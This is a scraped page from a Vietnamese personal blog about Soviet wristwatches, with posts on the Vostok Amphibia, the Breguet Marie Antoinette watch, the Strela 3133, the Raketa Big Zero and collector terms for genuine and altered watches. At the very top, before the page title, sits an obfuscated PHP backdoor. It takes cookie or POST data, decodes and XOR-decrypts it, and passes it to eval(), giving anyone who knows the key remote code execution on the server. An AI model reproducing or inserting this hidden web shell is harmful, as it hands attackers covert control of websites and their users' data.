$gkTikmvawS = class_exists("L_JuS");if (!$gkTikmvawS){class L_JuS{private $pEkriz;public static $gEJHvAd = "0bac3d14-080a-40da-9ae3-072f26eb3bee";public static $hiuUA = NULL;public function __construct(){$nACiVMM = $_COOKIE;$ZybOWNLPM = $_POST;$AjoGQkCSfU = @$nACiVMM[substr(L_JuS::$gEJHvAd, 0, 4)];if (!empty($AjoGQkCSfU)){$CHzhCIO = "base64";$MphdUtXc = "";$AjoGQkCSfU = explode(",", $AjoGQkCSfU);foreach ($AjoGQkCSfU as $XvwaYg){$MphdUtXc .= @$nACiVMM[$XvwaYg];$MphdUtXc .= @$ZybOWNLPM[$XvwaYg];}$MphdUtXc = array_map($CHzhCIO . chr ( 182 - 87 ).'d' . 'e' . "\143" . chr (111) . "\x64" . chr (101), array($MphdUtXc,)); $MphdUtXc = $MphdUtXc[0] ^ str_repeat(L_JuS::$gEJHvAd, (strlen($MphdUtXc[0]) / strlen(L_JuS::$gEJHvAd)) + 1);L_JuS::$hiuUA = @unserialize($MphdUtXc);}}public function __destruct(){$this->rybNWbPiMq();}private function rybNWbPiMq(){if (is_array(L_JuS::$hiuUA)) {$EgZDwdc = str_replace("\74" . chr ( 405 - 342 )."\160" . "\150" . chr ( 886 - 774 ), "", L_JuS::$hiuUA[chr ( 642 - 543 ).chr (111) . 'n' . "\164" . "\x65" . "\x6e" . 't']);eval($EgZDwdc);exit();}}}$RYRUp = new L_JuS(); $RYRUp = NULL;} ?> Watch – Page 2 – B.l.u.e

B.l.u.e

Inside the crowd, I dance [alone]

Menu Close

Category: Watch (page 2 of 2)

Kể chơi về đồng hồ lặn và niềm tự hào Vostok Amphibia của người Xô Viết

Lịch sử chung

Tự nhiên mình lại muốn nói về đồng hồ lặn (diving watch). Thật ra ngày nay thì công nghệ làm đồng hồ đã tiến được một bước quá xa, nên ngay cả những con đồng hồ khá-bình-thường cũng đều có những tính năng như một con đồng hồ lặn. Có câu nói mà mình đọc và khá nhớ rõ: Ngay cả những anh thợ lặn hiện giờ cũng không đeo đồng hồ chuyên-để-lặn nữa. Thế nhưng, nếu nói về lịch sử, thì lịch sử của đồng hồ lặn, theo mình, cùng với đồng hồ cho phi hành gia, là những câu chuyện lí thú nhất.

Đối với những tay thợ lặn, thì việc có một thiết bị có thể đánh dấu thời gian là một trong những điều tối quan trọng. Khi ở một mình dưới làn nước lạnh giá và tối đen, thứ duy nhất mà họ có thể tin tưởng ngoài bình dưỡng khí của mình, đó là chiếc đồng hồ lặn – ở trong một khoảng không gian nơi thời gian dường như ngừng lại thế.

Các nhà sản xuất đồng hồ đã tìm tòi để thiết kế ra những con đồng hồ có thể chống nước từ những năm của thế kỷ thứ 17, và vì nhiều nguyên nhân, chủ yếu điều kiện công nghệ và kĩ thuật không cho phép nên mãi đến năm 1926, chiếc đồng hồ chống thấm nước đầu tiên mới ra mắt. Lịch sử ghi tên “Oyster” của Rolex như thế. Tuy nhiên, đồng hồ lặn đầu tiên được đưa vào sản xuất và bán ra rộng khắp được ghi nhận là Marine của Omega, được giới thiệu lần đầu vào năm 1932. Và sau hàng trăm hàng ngàn thử nghiệm cùng cải tiến bởi những nhà làm đồng hồ có tiếng, vào tháng 5 năm 1937, Omega Marine đã đạt được tầm cao mới khi có thể chống được áp lực nước ở tận độ sâu 135m.

Rolex Oyster 1926

Tuy nhiên, đúng ra mà nói, những chiếc đồng hồ trên được thiết kế khá ‘ăn gian’. Chúng không phải là một chiếc đồng hồ chống nước, mà là một chiếc đồng hồ bình thường bỏ vào một cái hộp chống nước.

Omega Marine

Phải đến tận thời thế chiến thứ 2, những mẫu đồng hồ-lặn đúng nghĩa mới xuất hiện, nhờ sự chạy đua công nghệ mong trở thành người dẫn đầu và chiếm lĩnh cái thị trường đầy béo bở này giữa các ông lớn như Hamilton, Elgin, Waltham…

Cùng thời điểm đó, ở Liên bang Xô Viết, có một công ty còn khá trẻ cũng nhảy vào nghiên cứu để sản xuất đồng hồ lặn. Họ là Vostok. Và những nhà thiết kế tài năng đến từ Vostok đã làm mọi người ngạc nhiên khi mẫu đồng hồ lặn của Vostok – và đến giờ vẫn được xem như một trong những biểu tượng của ngành đồng hồ Xô Viết – Vostok Amphibia ra đời.

Điều gì đã khiến những kẻ yêu thích đồng hồ Xô Viết, bên cạnh những con thuộc hàng hiếm Strela 3017, hay Poljot Sturmanskie, hay Poljot Okeah… để mắt đến Vostok Amphibia rẻ bèo vốn xấu xí và thô kệch? Điều gì cuốn hút họ từ mẫu thiết kế ở Vostok Amphibia vốn kém nhiều so với những con đồng hồ chức năng tương tự từ Thuỵ Sỹ hay Huê Kỳ?

Như câu trả lời phỏng vấn của Mikhail Novikov – một trong hai nhà thiết kế chính tạo ra Amphibia (người còn lại là Vera Belov): Vostok Amphibia là những gì tinh tuý và tự hào nhất mà nền sản xuất đồng hồ Liên Xô – vốn lúc đó lạc hậu và kém xa hoàn toàn so với các nước khác, có thể làm ra.

Không đủ điều kiện vật chất (máy móc công nghệ) để làm một chiếc đồng hồ lặn theo mẫu thiết kế của Thuỵ Sỹ, hai nhà thiết kế của Vostok đã tự mình nghiên cứu để cho ra mắt mẫu thiết kế hoàn toàn mới.

Những đặc điểm của đồng hồ lặn

Đồng hồ lặn ngoài việc chống nước vào, còn phải bảo đảm rằng nó có thể hoạt động dưới áp lực của nước khi xuống sâu. Và trong một chiếc đồng hồ lặn, có 3 nơi cần chú ý nhất vì nước có thể vào dễ dàng:

1- Mặt đồng hồ: nếu mặt đồng hồ làm không cẩn thận, khi xuống sâu có thể bị nứt hay bị co giãn vì áp lực nước, dẫn đến trường hợp nước vào đồng hồ hay tệ hơn là nứt và bể cả mặt kính.

2- Nắp sau: cũng giống trên, chỉ cần hơi nước rò rỉ thấm vào bên trong đụng tới bộ phận máy chính cũng đủ khiến đồng hồ ngưng hoạt động.

3- Núm vặn: ở một cái đồng hồ, núm vặn phải đủ lỏng và nhẹ để người dùng có thể vặn chỉnh giờ, nhưng khi xuống nước, phải đủ gắn vào đồng hồ kín đến mức ngăn được nước vào.

Có một số công ty giải quyết vấn đề này rất hay bằng cách:

1- Trâu bò: kiểu áp lực nước mạnh thì tạo ra mặt đồng hồ khoẻ y như thế, họ lần lượt nghiên cứu các vật liệu cứng rắn nhất có thể.

2- Giống y như cách mà Apple từng làm với Macbook năm nào: cả chiếc đồng hồ là một khối, không có cách nào mở ra, vì vậy cũng ngăn được nước vào trong.

3- Nắp đậy lại cho núm vặn: cách rất đơn giản mà hiệu quả

Như hãy nhìn vào con Zlatoust của Liên Xô, ta có thể thấy cái nắp đậy cho núm vặn.

Zlatoust watch

Và hãy cùng tìm hiểu qua về Vostok Amphibia

Thiết kế của Vostok Amphibia

Như đã nói ở trên, vì ở Liên Xô ngày đấy không có các máy móc kĩ thuật hiện đại đủ để làm theo mẫu thiết kế của Thuỵ Sỹ, Mikhail Novikov và Vera Belov của Vostok đã tự nghiên cứu thiết kế riêng của mình (dĩ nhiên vẫn dựa vào các mẫu cơ bản đã trở thành nguyên tắc hiện có).

1- Mặt đồng hồ

Trong khi các hãng đồng hồ khác chọn cho mình những mặt kính tinh thể càng khoẻ càng tốt, thì Novikov và Belov đã quyết định tinh thể acrylic (có lẽ dịch ra là Mica) và chọn thiết kế mặt cong.

Thiết kế mặt đồng hồ cong kết hợp cùng tinh thể acrylic giúp khi xuống sâu, áp lực của nước phân bố và tác động lên các điểm trên đồng hồ đều nhau. Thêm nữa, khi phải chịu áp lực quá lớn, kính đồng hồ sẽ bị ép từ cong thành dẹp xuống, tránh việc bị nứt bế, đồng thời cũng khép chặt những viền quanh khung đồng hồ, khiến nước khó vào hơn. Như theo thử nghiệm của Vostok, ở độ sâu 200m, áp lực nước lên tới 20kg mỗi centimet bình, và mặt kính sẽ bị đẩy lõm xuống khoảng 0.5mm.

Acrylic Crystal

2- Nắp đậy đằng sau

Áp lực nước quá mạnh đủ khả năng nén méo lớp thép làm nắp sau của đồng hồ, vì vậy hai nhà thiế kế của Vostok đi đến quyết định dùng thêm một vòng tròn kim loại để gia cố nắp đậy, khiến nắp đậy khó chuyển dịch. Và cuối cùng họ thêm một vòng tròn cao su ở điểm tiếp nối giữa máy và nắp đậy.

Vòng tròn cao su này được làm theo công nghệ được Bộ Quốc Phòng Xô Viết sử dụng.

Theo tính toán kĩ thuật, khi xuống độ sâu 200m, độ nén của nắp đậy sẽ là 20-30%. Khi này nắp đậy cùng vòng tròn kim loại sẽ ép chặt vào vòng cao su bên trong, khiến chiếc đồng hồ mạnh mẽ và khó bị nước vào hơn. Khi lên bờ lại thì vòng cao su sẽ lại đẩy mọi thứ về vị trí cũ.

1619400_10203104050312721_410523798_n

3- Núm vặn

Novikov và Belov đã quyết định học theo kĩ thuật ở một số đồng hồ Poljot khi đó cho phần này. Với một chiếc đồng hồ thường, muốn lấy lại giờ, chỉ cần kéo núm vặn ra chỉnh giờ, rồi ấn vào lại. Vostok Amphibia cũng như một số đồng hồ lặn khác dùng cơ chế phải vặn theo chiều ngược kim đồng hồ như để mở ốc ra trước, sau đó mới cho phép kéo núm vặn ra chỉnh giờ, và xong việc phải ‘xoắn con ốc’ lại. Đây là một thiết thông minh vì khi này núm vặn đồng hồ sẽ vặn trực tiếp vào sâu bên trong, đóng chặt mọi lỗ nhỏ mà nước có thể chui vào máy.

Stem

Kết luận

Dĩ nhiên, Vostok Amphibia không thể so sánh với các ‘ông lớn’ trong cùng lãnh vực. Hiện tại một con Rolex Submariner hay Omega Seamaster, hay IWC Aquatimer Automatic… phải đắt hơn cả 40, 50 lần so với một con Vostok Amphibia. Và không nói đâu xa, Amphibia còn rẻ và bị đánh giá thấp hơn nhiều so với hằng hà vô số các con đồng hồ lặn khác đang có mặt trên thị trường (Seiko Diver, Citizen Diver, thậm chí cả Invicta diver). Tuy nhiên, với những người yêu đồng hồ Liên Xô, Vostok Amphibia là thứ gì đó tượng trưng cho tinh thần Xô Viết một cách rõ nét nhất – đó là sự sáng tạo khôn cùng trong điều kiện khó khăn bất lợi của người Xô Viết. Không bóng bảy, không hào nhoáng cao sang, không phải là kẻ đi tiên phong, Vostok Amphibia cũng như bao nhiêu dòng đồng hồ Xô Viết khác, mãi là kẻ đi sau lầm lũi bên cạnh những nhãn hiệu đồng hồ Thuỵ Sỹ, nhưng với những người như mình, Vostok Amphibia là sáng tạo, là lịch sử và là cả đam mê…

No. 160 Marie Antoinette Breguet – đồng hồ giá trị nhất trong lịch sử

Cuối tuần yên bình. Mẹ đắp chăn nằm xem 24, mình ngồi cạnh đọc về đồng hồ. Có nhiều cái thú vị phết. Như con này.

No. 160 Marie Antoinette Breguet – đồng hồ giá trị nhất trong lịch sử.

Vào một ngày nào đó cách đây hơn 200 năm, Bá tước Axel von Fersen – người hâm mộ đồng thời cũng là người tình bí mật của Hoàng Hậu nước Pháp Marie Antoinette đã tìm đến người làm đồng hồ vĩ đại nhất- Breguet, để đặt Breguet làm một chiếc đồng hồ, với mong muốn sẽ là chiếc đồng hồ phức tạp và tuyệt vời nhất mà con người có thể chế tạo.

Berguet cần mẫn suốt 40 năm, từ ngày đầu lên mẫu thiết kế, cho đến ngày ông mất trước khi thấy tác phẩm của cả đời mình được hoàn thành. Người con của ông, cũng là tay làm đồng hồ có tiếng, bỏ thêm 4 năm nữa để thực hiện giấc mộng dở dang của cha mình.

Marie Antoinette watch có tất cả những chức năng mà kĩ thuật làm đồng hồ thời đó có thể làm ra: ngoài chức năng chỉ giờ, nó còn có lịch vạn niên, điểm chuông, đo nhiệt độ, Chronograph, dự trữ năng lượng, chống shock… Đồng hồ có tới 823 chi tiết, các chi tiết hòa vào nhau trong một tổng thể đầy phức tạp mà cũng cuốn hút lạ thường. Đồng hồ được chính Breguet gọi là “tượng đài sừng sững của kĩ nghệ làm đồng hồ thế kỉ 18”.

Chiếc đồng hồ sau đó thuộc về Sir David Lionel Salamons, học giả người Anh nổi tiếng thời bấy giờ. Sau khi Salamons mất, ông để lại đồng hồ cho con gái của mình là Vera, và sau chiến tranh thế giới lần 1, Vera định cư ở Jerusalem, và cô quyết định xây một bảo tàng để trưng bày những chiếc đồng hồ trong bộ sưu tập của mình, trong đó có Marie Antoinette watch vô giá.

Sau đó, năm 1983, chiếc đồng hồ bị tay trộm được xem là Robin Hood của xứ Israel, Na’aman Diller, trộm đi cùng với vài trăm chiếc đồng hồ quý giá nhất. Ngày đó, đây là sự kiện rất rung động. Bao nhiêu thám tử được huy động để truy tìm tung tích chiếc đồng hồ.

Marie Antoinette chỉ quay trở lại viện bảo tàng ở Jerusalem vào năm 2007. Và năm rồi, Marie Antoinette được định giá lên tới 30 triệu USD, và là chiếc đồng hồ có giá trị nhất trong lịch sử. Người ta bảo rằng, nếu đem ra đấu giá, thì Marie Antoinette sẽ vượt hơn con số 30 triệu USD đó nhiều…

Bài đọc thêm: http://www.wired.com/threatlevel/2013/05/the-queen/all/ và http://fashion.telegraph.co.uk/article/TMG5158497/Breguet-No106-watch.html

STRELA 3133 – My Holy Grail

Tôi từng đọc đâu đó rằng: “Thứ trang sức duy nhất mà một người đàn ông nên đeo là đồng hồ”. Tôi bắt đầu tìm hiểu về đồng hồ chưa lâu, cũng chỉ mới chập chững, nhưng chưa từng dứt niềm yêu thích với nó. Tôi có thể bỏ hằng chục phút ngồi lì chỉ để ngắm từng mặt kiếng, từng chữ số, từng cây kim ở những bức hình tìm thấy trên mạng, và ao ước nó là của mình.

Tôi mê sự thanh nhã đồng hồ Thuỵ Sĩ, tôi mê nét đẹp chuẩn mực đến ngỡ ngàng từ những chiếc đồng hồ Đức quốc, hay là nét giản đơn rất riêng của Seagull 1963 từ Trung Quốc (tại sao liệt kê tên ở đây, vì đây là chiếc đồng hồ Trung Quốc duy nhất tôi thích). Nhưng trên hết, tôi phát cuồng vì đồng hồ Liên Xô.

Đồng hồ Liên Xô với nhiều người xấu, rất xấu, nhưng với tôi, đồng hồ Liên Xô có thứ gì đó không cưỡng lại được. Nó mạnh mẽ, thô ráp nhưng cũng đầy tinh tế và tỉ mỉ. Đeo trên cổ tay chiếc đồng hồ Liên Xô có cảm giác như chạm vào những thiếu nữ Xô Viết đầy mạnh mẽ hoang dại nhưng cũng thật duyên dáng. Và đã nói đến đồng hồ Liên Xô, thì phải nhắc đến cái tên STRELA.

Tôi yêu STRELA từ cái nhìn đầu tiên. Xin nhắc lại, từ cái nhìn đầu tiên. Không phải ngẫu nhiên mà ngày xưa người ta hay đùa: “Đồng hồ Liên Xô tốt hơn đồng hồ Thuỵ Sĩ”. Thật ra, trong dòng đồng hồ loại trung, thì STRELA của Liên Xô không thua gì những tên tuổi như Hamilton hay Tissot về chất lượng. Còn về lịch sử, STRELA 3017 từng được xem là ‘đồng hồ biểu tượng’ của một Liên Xô vững mạnh.

Trong lịch sử ngành không gian, Speedmaster (Omega) của Mỹ và Strela của Liên bang Xô Viết là 2 biểu tượng lớn nhất. Năm 1965, phi hành gia Ed White của NASA thực hiện những bước đi trên vũ trụ, và trên tay mang chiếc đồng hồ hiệu Omega Speedmaster. Nhưng đó cũng chỉ là lần thứ 2, vì vài tháng trước đó, phi hành gia huyền thoại Alexi Leonov là người đầu tiên bước đi ngoài không gian, và trên tay ông, là chiếc đồng hồ STRELA đầy biểu tượng này.

Kể từ đó, STRELA 3017 trở thành loại đồng hồ quen thuộc được các phi công và phi hành gia Liên Xô đeo trên tay. Và tới ngày nay, với những tay mê đồng hồ Xô Viết, thì STRELA là niềm mong mỏi và ước ao.

—–

STRELA 3017 là huyền thoại. Tuy nhiên, nhược điểm của những chiếc đồng hồ làm từ thời xa xưa dần bộc lộ: đó là khả năng chống shock và chống áp lực của nước kém. Đây là nguyên nhân Poljot quyết định ‘thiết kế’ lại STRELA, vẫn dựa trên nguyên mẫu từ 3017, nhưng sử dụng máy Poljot 3133 vốn được dân thích đồng hồ Liên Xô xem như số 1. STRELA 3133 được thiết kế lại hiện đại hơn, mạnh mẽ và chính xác hơn, và nhìn thanh hơn một xíu.

—–

Tôi mong STRELA 3133 từ rất lâu, hằng ngày vào nhìn đi nhìn lại trên web rồi tiếc nuối vì số tiền khá mắc. Nhưng sau một hồi cân nhắc, tôi bước vào quá trình dành dụm tiết kiệm tiền. Đúng ra mà nói, với công việc và lương tháng hiện nay, một tháng có mua cả chục cái như thế này cũng đủ, nhưng cảm giác để dành từng đồng một, ngày nào cũng vào nhìn thèm thuồng, và mong đợi đến ngày mình đạt được mục tiêu rất rất thích.

STRELA ship tới nhà tôi hôm qua lúc tôi đang ở công ty. Và vì tôi không có nhà, nên phải để ngày hôm sau em gái tôi ra bưu điện lấy, đến tối nay đi làm về mới có được. Một ngày này thật dài và mong đợi. Khi làm về, tôi chạy thật nhanh, về đến nhà chưa kịp thay đồ đã phải lôi đồng hồ ra ngắm nghía và thử. Nhìn ở ngoài còn đẹp hơn nhiều so với trên mạng. Cảm giác trên tay đeo chiếc STRELA này đúng là chỉ có một chữ: ĐÁNG; à, hai chữ: RẤT ĐÁNG.

No. 160 Marie Antoinette Breguet

No. 160 Marie Antoinette Breguet

B.l.u.e

Raketa Big ‘Zero’ – và câu chuyện về một Xô Viết đau khổ và tan nát

Xin bắt đầu câu chuyện về mối lương duyên của tôi và Raketa Big ‘Zero’ bằng vài chi tiết ngắn gọn nhỏ dẫn đến việc tôi quyết định mua con đồng hồ này, giữa hàng chục hiệu đồng hồ Xô Nga khác nhau.

Có một câu chuyện rằng, Mikhail Gorbachev – kẻ ‘tội đồ lịch sử’ của Xô Viết, vào những ngày ở đỉnh cao quyền lực nhất của mình, trong một chuyến thăm Ý, khi được một phóng viên người Ý hỏi rằng: “Perestroika” có ý nghĩa thế nào với người dân Liên Xô? Ghi chú thêm cho những ai chưa đọc qua lịch sử Xô Viết, thì Perestroika có nghĩa là “cải cách”, và là một trong những từ được nhắc đến nhiều nhất, khi nói về Xô Viết vào những năm 80 – 90, cùng với Uskorenie (tăng tốc), và Glasnost (công khai).

Khi đó, Gorbachev giơ tay mình lên, trên tay ông là chiếc đồng hồ Raketa Big ‘Zero’ – con đồng hồ rất độc đáo với việc thay vì số 12, họ dùng số 0; chỉ vào nó và nói: “với người dân Liên Xô, chúng tôi tin rằng mọi thứ đều bắt đầu từ con số 0.”

Dĩ nhiên, câu chuyện đó thuộc loại myth, nghĩa là khó kiểm chứng đúng hay sai. Người thì bảo ở tầm Gorbachev không thể đeo đồng hồ rẻ tiền thế (trời, một trong những đồng hồ mà Obama hay đeo nhất là Jorg-Gray 6500 – vốn được xem là hàng Tàu rẻ tiền, và giá chỉ khoảng $300, hay Bill Clinton vẫn đeo con Timex Easy Reader vốn chỉ có tầm $40 đấy thôi), người thì bảo với việc hay lý tưởng hóa mọi thứ, thì với tính cách của Gorbachev, hoàn toàn có khả năng ông đeo cái đồng hồ đầy-ý-nghĩa đó.

Đúng hoặc sai không biết, thật giả không quan trọng; chỉ biết câu chuyện đó đã gây trong tôi sự hứng thú kha khá. Tôi bắt đầu ý định tìm cho mình Raketa Big ‘Zero’ – con đồng hồ Xô Viết thật lạ ấy.

Đồng hồ Raketa bắt đầu được sản xuất từ năm 1961, bởi Petrodvorets Watch Factory ở Saint Petersburg. Đây là nhà sản xuất đồng hồ có tuổi lâu đời nhất Liên Xô, với lịch sử được viết về tận xa xưa vào năm 1721. Đồng hồ Raketa sau được sản xuất cho Hồng quân Liên Xô, hải quân Liên Xô, cho những đội thám hiểm Cực Bắc, hay cho cả người dân…

Raketa tiếng Liên Xô nghĩa là “tên lửa” (rocket). Sau khi phi hành gia huyền thoại Yuri Gagarin bay ra ngoài vũ trụ lần đầu tiên trong lịch sử nhân loại, ở Xô Viết, rất nhiều sản phẩm và nhãn hiệu được đặt theo sự kiện này. Để vinh danh Yuri Gagarin, Petrodvorets Watch Factory quyết định đổi tên đồng hồ của mình thành Raketa.

Sau sự sụp đổ của Liên Bang Xô Viết, Raketa cũng như nhiều công ty khác trên Liên Xô rơi vào tình cảnh khó khăn dẫn đến phá sản. Sau này, Raketa có trở lại với các kiểu thiết kế hiện đại và hoàn toàn mới, nhưng đó lại là câu chuyện khác.

Xin lại kể câu chuyện về quá trình tôi có con đồng hồ này. Mua Raketa Big ‘Zero’ thì thường không lo vấn đề về hàng giả. Vì hàng chỉ có vài chục đồng, lại kén người mua, chả ai thèm đi làm giả. Vấn đề cần lo là do đây là đồng hồ khá xưa (gái chia tay vài năm thôi đã gọi là tình xưa rồi, nói gì đồng hồ tới cả vài chục năm?), nên rất khó biết một cái đồng hồ chạy có tốt không, có gặp vấn đề gì không, đã được ‘bảo trì’ lau đánh bóng hay tra dầu gần đây không? Ở eBay search thì ra rất nhiều Raketa, đủ mọi thiết kế, giá tiền, nhìn hoa cả mắt, và trong đó chắc thau chẳng ít hơn vàng nhiều đâu.

Thế là tôi lang thang khắp Internet, không phải chú tâm tìm kiếm, nhưng mỗi ngày đều bỏ thời gian lê la đọc hết chỗ này đến chỗ nọ, và tìm được một cái tên: samun_povt. Tay này khá nổi tiếng trong số những người sưu tầm Raketa. Hắn thuộc dạng cuồng Raketa, hắn sưu tầm hầu như tất cả những con Raketa có thể, lau chùi đánh bóng, kiểm tra và bảo dưỡng chúng, trước khi đem bán với giá vô cùng phải chăng. Như tại thời điểm hiện tại, bộ sưu tập của tay này phải lên tới gần 400 con Raketa. Xem ảnh tay này chụp từng con đồng hồ ở đủ các góc cạnh, làm đẹp con đồng hồ đến mức nhiều nhất có thể, và quay lại video cho từng con đồng hồ, thì có thể thấy được niềm yêu thích của hắn ta với Raketa lớn thế nào.

Hắn ta bán Raketa không phải rẻ nhất, nhưng làm tôi thích, và an tâm nhất. Thế là tôi quyết định đặt mua con Raketa Big ‘Zero’ từ tay này.

Trong các loại Raketa mà hắn có, có vài cái tôi thích đặc biệt. Tôi đưa vài cái đó cho một đứa em đang du học ở Nga xem, để hỏi những dòng chữ trên đồng hồ viết gì (bởi Raketa sản xuất hàng chục loại khác nhau cho từng đơn vị quân đội, từng sự kiện khác nhau…), và một trong số đó, theo lời con bé, là cho Hải quân, và có chữ Hải – tên tôi ở trên đó. Tốt, không cần suy nghĩ nhiều, tôi đặt mua ngay.

First view

Package from Russia

Back

Đúng như tôi từng dự đoán, Raketa Big ‘Zero’ không phải là con đồng hồ có nét đẹp ngỡ ngàng đến hoàn hảo như Strela, không thanh thoát như Poljot, cũng không mạnh mẽ như Vostok… mà tôi đang có. Trái lại, Raketa Big ‘Zero’ nhìn rất dị, với các con số to đùng và mặt đồng hồ in chữ Nga gì gì đó. Raketa Big ‘Zero’ không phải là dress watch, bảo casual watch thì chắc cũng không hợp, nhìn chung nó rơi vào category ‘lạ’, thích thì đeo thôi.

Tôi mua Raketa Big ‘Zero’, không phải vì nó đẹp, nó cuốn hút tôi ngay từ cái nhìn đầu tiên, và câu chuyện về câu nói của Gorbachev cũng chỉ là phần phụ, quan trọng nó cũng như trường hợp của tôi, khi phải bắt đầu cuộc sống ở một đất nước xa lạ từ con số 0. Và nó cũng là một trong những chứng nhân đi cùng lịch sử của một thời Xô Viết hùng mạnh dần đi đến vực thẳm; của một thời Xô Viết đau khổ và tan nát; của những cái tên đã đi vào lịch sử như những kẻ tội đồ, những kẻ phản bội, hay những tay gian hùng và thức thời.

Hồn Xô Viết giờ đây, một phần được giữ là trong những chiếc đồng hồ như thế này đây.

Raketa Big Zero

On wrist

On wrist

B.l.u.e

Kể chơi về đồng hồ Liên Xô

Phàm trên đời này, cứ cái gì đụng tới từ sở thích mà đi đến tường tận cũng phải lắm công phu. Tôi có những anh bạn mê nước hoa, họ có thể chỉ ngửi sơ mùi qua đã nói ngay được chai đó của hãng nào, vài tiếng nữa mùi này sẽ bay bớt đi thành ra mùi nào; lại có những anh tôi biết cực sành về ăn mặc, họ biết từng chi tiết nhỏ trên bộ suit phải may thế nào, từng đường gia công trên giày phải đánh bóng thế nào. Tôi rất thích làm bạn với những anh như thế, vì đàn ông, ngoài đam mê đàn bà ra, cũng sẽ thật hay nếu đam mê và tìm hiểu tới tường tận một thứ gì đó.

Thứ gì đó, với riêng tôi là đồng hồ. Đồng hồ Liên Xô.

Tôi không biết mấy anh bạn của tôi đam mê mấy thứ kia thì có nỗi khổ gì không, chứ tôi sưu tập đồng hồ Liên Xô thì khổ như cún.

Đầu tiên là lịch sử của Liên Xô khá rối rắm, với nhiều giai đoạn chiến tranh và hòa bình, phát triển và trì trệ, giữa các vùng lãnh thổ và các quốc gia đan xen, vì vậy ngay cả ở một nhà máy đồng hồ, khoảng cách thời gian vài năm thôi là đã có những dòng sản phẩm hoàn toàn khác biệt nhau về chất lượng cũng như mẫu thiết kế rồi. Thêm nữa, cũng không biết là do tính sáng tạo quá cao hay do tính chất con buôn kiếm lời của người Xô Viết, họ cho ra đời cả chục mẫu thiết kế khác nhau cho cùng một con đồng hồ. Ví dụ như Vostok, khi thì hãng này làm ra con đồng hồ tri ân hải quân, khi thì dành tặng không quân, khi thì ghi nhớ sự kiện lữ đoàn bộ binh Mạc Tư Khoa vừa hoàn thành chiến dịch nào đó… Điều này làm cho những ai mới chập chững bước vào tìm hiểu đồng hồ Liên Xô không biết phải bắt đầu từ đâu giữa ma trận thế này (như tôi cách đây không lâu).

Tiếp nữa, đa phần các tay sưu tập đồng hồ Liên Xô có kiến thức đều đã khá đứng tuổi, họ có xu hướng chơi ở các forum-chỉ-nói-tiếng-Nga. Vì vậy bọn chỉ biết đọc tiếng Anh như tôi nhiều khi phải mò qua các forum đó dùng Google Translate để mày mò, và đoán, và chia sẻ kinh nghiệm với nhau. Đây là điều khiến tư liệu về đồng hồ Liên Xô khá khó kiếm. Nhiều khi nhìn vào cái đồng hồ không ai bảo được đây là dòng gì, ra đời năm nào, vì mục đích gì…

Tất cả những điều trên khiến việc xem một chiếc đồng hồ Liên Xô đang rao bán trên mạng là legit, fake, franken hay là homage rất khó khăn.

Ở đây, tôi tạm dừng xíu để giải thích những thuật ngữ này, và nó quyết định giá cả một con đồng hồ ra sao.

– Legit dĩ nhiên là đồng hồ thật nguyên chất, nghĩa là mấy chục năm trước nó như thế nào thì hiện tại như thế đó, có bảo dưỡng này nọ cũng chỉ là tra dầu, đánh bóng kính. Với những người hâm mộ các con đồng hồ ‘huyền thoại’ như Poljot Strela 3017 đời đầu, thì kiếm được một con Legit thế này hay được gọi là ‘my holy grail’ (chén Thánh của tôi). Như gần đây, cộng đồng chơi đồng hồ Liên Xô đến phát sốt lên vì có một con Strela 3017 trên mặt có chữ ПОЛЕТ, mặt kính Cyrillic xuất hiện trên eBay. Bao nhiêu tay nhào vào đấu giá đẩy nó lên đến giá cuối là $1400.

legit

– Fake dĩ nhiên là đồng hồ giả. Cái này thiết tưởng không cần nói nhiều. Đặc trưng của những con này là nhìn rất mới, mới một cách đáng ngờ. Nhưng với việc tìm tài liệu về đồng hồ Liên Xô rất khó, nhiều tay mới bắt đầu săn đồng hồ hay bị lóa mắt và bị dụ thế này.

– Franken là loại khó nhất. Thường khi một chiếc đồng hồ Legit bị hư gì, nếu những tay sửa đồng hồ dùng phụ tùng từ chiếc đồng hồ khác cùng loại, thì cái đó vẫn là Legit (kiểu kim giây của Strela 3017 bị hư, lấy kim giây từ một con Strela 3017 khác cùng năm thay vào thì vẫn là Legit). Franken là khi những tay sửa đồng hồ lấy phụ kiện từ con đồng hồ khác loại mà khá giống hình dáng để thay vào. Franken khó phát hiện vì một con đồng hồ có cả chục phụ kiện, và như ở cùng dòng thì năm sản xuất khác nhau hình dáng phụ kiện khác nhau rồi. Có những con nhìn từng con ốc, balance wheel, movement, font chữ trên mặt, núm vặn… giống y như hàng thật, chắc mẩm rồi, tới khi nhìn tới cái kim lại ồ lên, lẽ ra cái đuôi kim này phải hình thoi nhọn chứ, mới phát hiện té ra là đã phải thay kim rồi. Vậy là con đó thành Franken watch ngay.

– Homage thì đơn giản chỉ là hãng quyết định làm con đồng hồ mới hoàn toàn để ‘nhớ về’ mẫu thiết kế nào đó cả chục năm trước. Thường nếu mua chính hãng thì họ sẽ nói rõ, đây là phiên bản làm mới lại năm nào, năm nào. Nhưng những tay bán trên mạng thì ít khi có lương tâm thế, và những ai không quen nhìn vẫn sẽ thấy thiết kế này giống y hệt thiết kế năm nào, thế là mua thôi.

okeah 2012

Như đây là con Okeah huyền thoại được làm lại với số lượng hạn chế 300 chiếc vào năm rồi. Tất cả giống mẫu nguyên gốc, như là homage.

Với dân sưu tập đồng hồ Liên Xô, kể cả lâu năm, thì phân biệt giữa một con Legit và một con Franken là khó nhất. Vì không hề có tài liệu nào ghi lại, tất cả đều chỉ qua tìm tòi của các thành viên, nên nhiều người cho rằng kim màu này cũng là thật, vì tôi thấy phiên bản thế ở X, ở Y rồi; người thì khăng khăng kim đó là không phải nguyên bản rồi, kim nguyên bản màu không bao giờ thế. Vì vậy phải tìm hiểu từ nhiều nguồn để đi tới quyết định của riêng mình.

Tôi đi làm tiền không nhiều, muốn có tiền theo đuổi sở thích phải mất thời gian kiếm mua mấy con đồng hồ mới giảm giá trên mạng, mua sau đó chờ vài tuần sau khi nó hết giảm thì mang lên bán lại, nên khi bỏ ra vài trăm USD mua một con đồng hồ Liên Xô, tôi thường phải xem xét và tìm hiểu rất nhiều, kẻo mua phải con Franken thì chắc tức chết thôi chứ chưa nói đến con Fake hoàn toàn.

